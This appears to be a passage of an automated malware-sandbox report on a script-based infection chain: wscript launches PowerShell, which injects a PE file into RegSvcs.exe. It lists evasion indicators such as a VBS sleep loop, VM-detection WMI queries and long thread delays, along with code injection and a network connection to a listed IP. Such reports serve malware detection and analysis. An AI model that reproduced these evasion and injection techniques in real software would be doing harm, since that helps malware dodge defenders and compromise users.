                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Potential evasive VBS script found (sleep loop)
                  Source: C:\Windows\System32\wscript.exeDropped file: Do While compteurBoucles < 10000 ' Limitation des itrations pour dmonstration WScript.Sleep 10000Jump to dropped file
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3817Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6101Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5772Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3910Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2449Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1134Jump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 6556Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 3228Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568Thread sleep count: 5772 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4204Thread sleep count: 3910 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98824Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98493Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: wermgr.exe, 0000000B.00000003.2478101574.0000011788FB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm=%SystemRoot%\system32\mswsock.dll87ed73cb92d3cac802400000000!0000f43d9bb316e30ae1a3494ac5b0624f6bea1bf054!powershell.exe" />
                  Source: wermgr.exe, 0000000B.00000002.2488933171.000001178900E000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000B.00000003.2487351854.000001178900E000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000B.00000003.2487739456.000001178900E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
                  Source: RegSvcs.exe, 00000008.00000002.3316811500.0000000005A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                  Source: wermgr.exe, 0000000B.00000002.2488688738.0000011788FB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm=PS
                  Source: wscript.exe, 00000000.00000003.2099439406.000001E896739000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079284658.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075194124.000001E896745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103295668.000001E896741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103647837.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100052014.000001E89673F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101127670.000001E896741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 370000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 370000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 372000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3AC000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3AE000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 58D008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
